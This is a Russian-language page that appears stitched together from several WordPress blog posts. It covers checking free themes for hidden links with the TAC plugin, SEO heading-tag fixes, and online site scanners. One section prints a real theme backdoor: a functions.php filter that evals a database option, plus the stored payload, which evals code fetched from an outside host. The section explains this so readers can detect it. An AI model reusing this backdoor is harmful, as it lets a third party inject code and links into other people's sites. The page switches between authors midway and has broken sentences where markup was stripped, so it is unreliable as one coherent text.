Как проверить шаблон wordpress на вирусы. Плагин TAC или как проверить шаблон на внешние ссылки. Проверка верстки шаблона для правил SEO

На просторах Интернета есть очень много бесплатных шаблонов сайтов. О том, что бесплатный сыр бывает только в мышеловке, знают все и все равно рука тянется скачать такую бесплатность и установить на свой сайт.

Прежде чем ставить бесплатный шаблон, не мешало бы его проверить на скрытые ссылки.

Ставя бесплатный шаблон, многие и не предполагают, что раскрутить и заработать на таком сайте просто не смогут.

В одном таком шаблоне может быть сразу несколько ссылок. Хорошо еще, если вложенные ссылки будут на схожий с вашей тематикой сайт, а не на сайты для взрослых. И их будет всего две или три, а не десятки.

Чем установка такого бесплатного шаблона грозит вашему сайту? Сайт попадет под фильтра, выйти из под которых практически невозможно. Сайт под фильтрами – мертвый сайт!
Установка бесплатного шаблона на свой сайт напоминает русскую рулетку. Только шанс установить абсолютно чистый шаблон, равен нулю.

В лучшем случае вы получите 3-5 левых ссылок на своем сайте. Можно, конечно, попробовать почистить такой шаблон, но есть умельцы, которые вписывают ссылки в шаблон так, что убрать их оттуда нельзя (нарушается шаблон, его просто перекашивает).

Если честно, то проще заказать новый чистый и уникальный (чего не скажешь о бесплатном) шаблон, дешевле обойдется.

За создание шаблона я, например, беру 200 руб (пишите в скайп: oxamitta). Вот скажите, оно того стоит? Взять бесплатность и потерять сайт, зато сэкономить 200 руб? Ничего себе экономия!!!

Но что делать, если вы уже поставили на бесплатный шаблон? Как проверить шаблон на скрытые ссылки?

Для этого существует специальный плагин. Убрать эти ссылки он не поможет, а вот выявить – пожалуйста.

Возможно, не все так страшно и в вашем шаблоне всего пара внешних ссылок! Хотите проверить шаблон? Тогда скачивайте плагин по ссылке ниже (чтобы появилась ссылка на скачивание плагина, кликните на одну из кнопок соц. сетей).

Плагин устанавливается в админке сайта стандартным образом. Снимать об этом видео нет смысла, поэтому сегодня мы обойдемся парой скриншетов.

Устанавливаете плагин и активируете.

Чтобы увеличить скриншет, кликните по нему левой клавишей мышки.

Заходите во вкладку Внешний вид, ТАС.

После того, как вы выбрали шаблон для установки на свой сайт WordPress, стоит проверить его верстку на соответствие основным правилам SEO (оптимизации). Например, коробочный шаблон «Twenty Fourteen» сверстан так, что заголовки виджетов выводятся в тегах

, что может отрицательно сказаться на продвижении сайта. Бывают другие недочеты верстки шаблонов, от которых нужно избавиться до наполнения сайта материалами и его открытия для поисковиков.

Чрезвычайно трудно найти готовый шаблон WordPress полностью удовлетворяющий своим потребностям. Довольно часто, подобранный шаблон нравится, но не устраивает его цветовая гамма или не нравится расположение сайдбара, заголовка, шрифт, и т.д. На платформе WP есть все возможности изменить WordPress шаблон под себя.

Для примера изменим коробочный шаблон WordPress под названием «Twenty Fourteen». Этот шаблон выступит практичным примером, на котором можно посмотреть все нюансы тонкой и не только тонкой настройки шаблонов WordPress.

Подготовка к редактированию шаблона

Перед любыми работами с кодом WordPress, в том числе изменении рабочего шаблона, нужно сделать и иметь под рукой:

  • (каталог и базу данных) ;
  • Резервную копию рабочего (редактируемого) шаблона.

Шаблон должен быть предварительно настроен на вкладке Внешний вид→Настройка.

Примечание: Чтобы сделать не сбрасываемые изменения в шаблоне, нужно перейти на . Работа на дочерней теме WordPress позволяет обновлять шаблон без потери сделанных изменений.

Как изменить WordPress шаблон «Twenty Fourteen» под себя

Я постараюсь показать принцип изменения шаблона, что позволит делать свои изменения любого шаблона WordPress.

Итак, задача: Есть шаблон «Twenty Fourteen» фото 1, делаем пользовательские изменения в шаблоне, заодно, проверяем верстку шаблона для соответствия правилам SEO оптимизации.

Примечание: Отмечу, что авторы многих шаблонов создают перенастраиваемые настройки своего шаблона, выводя интерфейс настроек на отдельную вкладку. Работая с такими шаблонами, вы легко, без изменения в коде шаблона можете выставить пользовательские настройки шаблона. Это не вариант, описанный в этой статьи.

Проверка верстки шаблона для правил SEO

Разберемся сначала с версткой шаблона. Перед проверкой выставляем предусмотренные настройки шаблона.

Для проверки верстки на соответствие правил SEO нам понадобится:

  • Поместить любой виджет на сайдбар (ы) шаблона. Пусть это будет календарь. Обязательно дадим виджету название.
  • Создать тестовую страницу и тестовый пост сайта.

Шаги проверки верстки шаблона для правил SEO

Шаг 1. Проверка главной страницы

1. Открываем домашнюю страницу сайта. Любой браузер имеет инструменты разработчика. Простое управление инструментами находим на правой кнопке мыши, для браузера Chrom «Посмотреть код». 2. На домашней странице сайта (страница последних записей) смотрим код на заголовке сайта. Если это текст, то он должен быть в тегах h1. Если это картинка, то она НЕ должна быть в тегах h1.

Важно! На любой странице сайта не должно быть больше двух тегов h1. Один открывающий

, второй закрывающий

.

3. Чтобы не «тыкать» все заголовки на странице, на правой кнопке мыши смотрим «Код страницы» и, открыв поиск по странице (кнопки ctrl+F) ищем «h1». Если поиск находит больше двух тегов h1, смотрим, что они обрамляют, и пытаемся это исправить. Исправление чуть ниже.
проверка верстки шаблона 4. Анонсы статей, в нашем примере это одна тестовая статья. Заголовок анонса должен быть в тегах h2. Если заголовки анонсов статей в тегах h1 или h3 нужно исправить. Исправление чуть ниже. 5. Все заголовки виджетов должны быть в тегах h3 или h4. Этот сайт сверстан так, что заголовки виджетов обернуты в тегах

, это нужно исправить. Исправление чуть ниже.

Повторяюсь! На любой странице сайта не должно быть больше двух тегов h1. Один открывающий

, второй закрывающий

.

Шаг 2. Проверка страницы тестового поста

После главной страницы сайта, открываем тестовый пост сайта. Здесь проверяем, чтобы тегами h1 обертывался только заголовок поста. Проверку делаем аналогично посту сайта. Нужно, чтобы тегами h1 обертывался только заголовок страницы.

Шаг 3. Проверка виджетов

Аналогично, смотрим теги заголовков виджетов в сайдбаре и футере.


проверка верстки шаблона виджеты

Итоги проверки верстки

В результате проверка верстки шаблона, на этом шаблоне, обнаружили, что заголовки виджетов в футере и сайдбаре сайта, обернуты в теги h1. Это нужно исправить .

1. Для исправления идем в каталог шаблона и открываем для редактирования файл functions.php . Под словами «идем в каталог шаблона», понимаем копирование нужного файла (можно из редактора консоли) и правки его в текстовом редакторе типа Notepad++. 2. В файле functions.php ищем, как задан вывод виджетов в шаблоне. Для этого шаблона видим, что заголоки виджета в тегах h1. Меняем h1 на h3. 3. Если в файле functions.php не задан вид заголовка виджета, идем в файл footer.php и смотрим, как в этом файле обернут заголовок виджетов в футере. Меняем h1 на h3.

Если мы нашли, что на главной странице анонсы статей выводятся в тегах h1, то есть на странице последних записей, есть несколько заголовков в h1, читаем статью и устраняем эту SEO ошибку верстки.

Тема статьи оказалась больше, чем я ожидал, поэтому придется изменить WordPress шаблон под себя, а именно изменить его внешний вид, будем в следующей статье. Предварительно, можно почитать статьи: Правила верстки файла каскадных стилей WordPress.

Под движок WordPress создано большое количество бесплатных тем и шаблонов. Все, что нам остается сделать – это найти правильный шаблон, скачать его и установить на свой блог. Собственно, так многие начинающие вебмастера и поступают. При этом они совершенно не задумываются о том, что данные шаблоны могут быть небезопасны для их будущего сайта. Шаблоны же часто создаются обычными пользователями движка WordPress.

Некоторые создатели размещают в шаблонах кучу внешних ссылок, которые могут вести на весьма сомнительные сайты. К примеру, шаблон содержит большое количество ссылок на ресурсы сексуальной направленности. Внешне эти ссылки не будут видны. Однако поисковый робот все равно их проиндексирует и отдаст данным сайтам часть вашего индекса цитирования. Кроме того, к вашему ресурсу могут быть применены различные санкции (если ссылок на подозрительные сайты слишком много). Возникает вопрос – что же делать с такими вот бесплатными шаблонами? Кстати, платные шаблоны тоже, не редко, грешат наличием скрытых ссылок.

Как проверить шаблон на внешние ссылки?

Проверить шаблон на наличие спрятанных в него внешних ссылок поможет плагин под названием TAC (аббревиатура расшифровывается как Theme Authenticity Checker). Скачать его можно по следующей ссылке на официальном сайте WordPress. Данный плагин полностью бесплатный, а также простой в установке и использовании.

После активации TAC, необходимо зайти в его параметры, располагающиеся по следующему пути — «Внешний вид» — «TAC». Там можно посмотреть результаты сканирования всех тем, которые установлены на вашем блоге. Если с темой все в порядке, то рядом с ее названием будет зеленый прямоугольник с надписью «Theme OK!».

Следует помнить, что эта надпись означает отсутствие каких-либо закодированных ссылок. Все остальные внешние ссылки будут указаны чуть ниже. Внимательно изучите эти ссылки и проверьте, куда они ведут. Как правило, в каждом шаблоне есть ссылка на сайт его создателя. Обычно эта ссылка является видимой для посетителей блога и находится в футере.

Среди вебмастеров принято не удалять такие ссылки, ведь это своеобразная дань уважения автору шаблона, который сделал его для вас бесплатно. Если в шаблоне есть ссылки на какие-то другие сайты, то их лучше удалить. Сделать это можно при помощи , открыв необходимый файл шаблона.

На этом буду заканчивать. Удачи Вам! и до следующих статей.
С огромным Уважением,

Понравилась статья? Подпишитесь на новости блога или поделитесь в социальных сетях, а я отвечу вам


3 комментариев к посту “Плагин TAC или как проверить шаблон на внешние ссылки”

    Просканировал я им шаблон и он показал — ок. Хотя что то добавляет ссылку wp-load.php. Что еще посоветуешь?

    Привет друзья. Вы уверены, что бесплатный шаблон WordPress, который вы используете для своих сайтов и блогов действительно безопасный и не содержит скрытых угроз и вредоносного кода? Вы полностью в этом уверены? Абсолютно?)

    Думаете, прогнали шаблон через , удалили из него скрытые ссылки, и дело сделано. Файлы сайта сканируете периодически антивирусом, заглядываете в инструменты вебмастера Яндекса во вкладку Безопасность и с облегчением видите там сообщение: «Вредоносный код на сайте не обнаружен «.

    Вот и я так думал. Не хотел бы вас расстраивать, но…

    Скрытый опасный код в бесплатных шаблонах WordPress

    Вот такое письмо я получил на прошлой неделе на почту от своего хостинга. С недавних пор они ввели регулярную проверку всех файлов сайта на поиск вредоносного содержания и таки они это содержание у меня обнаружили!

    Началось все с того, что я зашел как-то днем на свой сайт и не смог его запустить — вылезала ругательная надпись про не найденные файлы с расширением php. Немного напрягшись пошел изучать содержимое папки с сайтом на хостинге и сразу же обнаружил проблему — мой файл шаблона fuctions.php был переименован в functions.php.malware что как бы неоднозначно намекало — здесь поработал антивирус или что-то вроде этого) Зайдя на почту я и обнаружил вышеупомянутый отчет от хостера.

    Первым делом я конечно же начал проверять данный файл, изучал его содержимое, сканировал всевозможными антивирусами, десятками онлайн сервисов по проверке на вирусы и т.д. — в итоге ничего не обнаружил, все в один голос утверждали что файл совершенно безопасный. Я разумеется выразил свои сомнения хостеру, мол вы чего-то напутали, но на всякий случай попросил их предоставить отчет об обнаружении вредоносного куска кода.

    И вот что они мне ответили

    Пошел гуглить инфу о данном коде и серьезно задумался…

    Как найти фрагмент вредоносного кода в шаблоне

    Как оказалось, это действительно нетривиальный прием, который позволяет заинтересованным лицам передавать данные на ваш сайт и изменять содержимое страниц без вашего ведома! Если вы используете бесплатный шаблон, то настоятельно рекомендую проверить свой functions.php на наличие следующего кода :

    add_filter(‘the_content’, ‘_bloginfo’, 10001);
    function _bloginfo($content){
    global $post;
    if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false){
    return $co;
    } else return $content;
    }

    Даже с моими весьма неглубокими познаниями в php видно, что создается некий фильтр, привязываемый к глобальной переменной post и content отвечающие за вывод контента только на страницах записей блога (условие is_single). Уже подозрительно не так ли? Ну а теперь посмотрим что же такого собирается выводить данный код у нас на сайте.

    Интересная опция blogoption запрашиваемая в базе данных так же выглядит весьма подозрительной. Заходим в нашу базу данных MySQL и находим там таблицу под названием wp_options, если вы не меняли префиксы то она так будет выглядеть по умолчанию. И в ней находим заинтересовавшую нас строку под названием blogoption

    Какая красота! Мы видим следующую опцию


    return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

    Т.е. нам с некого сайта (причем русского заметьте) возвращают содержимое, которое может нести в себе все что угодно! Любое количество ссылок, вредоносные коды, измененный текст и т.д. Сам сайт при заходе на него выдает 403 ошибку доступа, что не удивительно. Разумеется данную опцию я тоже удалил из БД.

    По информации от пострадавших обычно возвращается точно такое содержимое вашей статьи с одной лишь модификацией — вместо какой-либо точки «.» в текст маскировалась открытая ссылка! И кстати, данная опция записывается в базу данных при установке самого шаблона, а затем код, который это делает благополучно самоуничтожается. И вот с такой дрянью я жил два года, и ни один антивирус или сервис мне так и не выявил данную угрозу за все то время. Честно говоря я не замечал, срабатывал ли когда-нибудь со мной такой прием, или же эту возможность блокировал мой плагин безопасности (а может одно из обновлений WordPressa закрыло эту дыру), но все равно неприятно.

    Мораль про бесплатный сыр

    Как вам изощренность наших «переводчиков» шаблонов (или тех кто выкладывает их у себя в каталогах)? Это вам не ссылки из футера выпиливать) Жалко я уже не помню, откуда я скачивал свой шаблон, давно это было, а то бы обязательно пару ласковых написал. И если бы на тот момент обладал тем же опытом, что имею сейчас, то однозначно не пользовался бы бесплатным шаблоном, или на крайний случай не качал бы с неизвестных источников!

    Проще купить какой-нибудь официальный премиум шаблон за 15-20 баксов на том же и жить спокойно, зная что в нем нет дырок и зашифрованных ссылок, а если даже и найдутся уязвимости, то разработчики обязательно выпустят обновление, в котором эти дырки закроют. (У Артема кстати недавно вышла статья, где он как раз про премиум шаблоны рассказывает и даже раздает промокоды на зверские скидки, кому интересно )

    Привет, друзья IdeaFox!

    Не знаю, как вы, а я вот плохо по ночам сплю. Мучают меня вопросы безопасности блога. Сил уже нет никаких: –)

    Перечитал кучу блогов на эту тему и протестировал много плагинов, которые помогают решить эту проблему. Да и в комментариях стали задавать вопросы по теме защиты сайта, что и подтолкнуло меня написать эту заметку.

    Вот представьте себе, что Вы ведете блог, пишите статьи, стараетесь… И приходят злые мудаки, которые ломают ваш сайт. Думаю, что огорчений будет очень и очень много.

    Ведь каждый нормальный блоггер вкладывает очень много времени и сил в развитие своего сайта. А для многих блоггинг вообще становится навязчивой идеей… Тут и до , если ТАКОЕ случится: –)

    Ну, вы поняли, насколько это важно.

    Перейдем к делу, наконец:)

    Пару месяцев назад я уже писал заметку про то, от взлома. Обязательно прочтите ее. Но с тех пор прошло довольно много времени и я принял дополнительные меры по усилению круговой обороны.

    В следующих заметках я обязательно подробно остановлюсь на этом вопросе. (Про настройку ISP тоже помню и пишу)

    3. Проверяем сайт на других онлайн-сервисах

    Таких сервисов развелось видимо-невидимо. У меня сложилось стойкое мнение, что многие из них совершенно бестолковые и созданы исключительно для показа рекламы.

    Доктор Веб

    Компания DR.Web cделала хороший сервис для проверки сайтов он-лайн. Лично мне он помог один раз найти заразу у друга на блоге (Был сторонний код в файле.htaccess)

    Проверка очень простая. Вносим свой URL и ждем результат проверки.

    antivirus-alarm.ru

    Мощный сканер сайтов, который использует аж 43 антивирусные базы от ведущих антивирусных компаний мира.

    Тут тоже все очень просто. Вбиваем URL своего сайта и с замиранием сердца ждем результатов сканирования.

    Вот я дождался таких.

    Все чисто, можно спать спокойно: –)

    Все это конечно хорошо, но нужно еще и установить пару плагинов, которые совсем не помешают для WordPress-блогов.

    4. Попросите хостера проверить Ваш сайт

    Дело в том, что хостеры еще больше вас обеспокоены вопросами безопасности и располагают мощными средствами защиты. Причем специализированными средствами защиты.

    Вот такие у меня новости для Вас сегодня. Дальше я расскажу про очень мощный плагин, который позволяет существенно защитить ваш ВордПресс блог от взлома.

    Я уже работаю с ним 2 месяца и очень им доволен. Пока разобрался с ним 3 раза сам себя забанил: –) Короче, есть что рассказать.

Loading...Loading...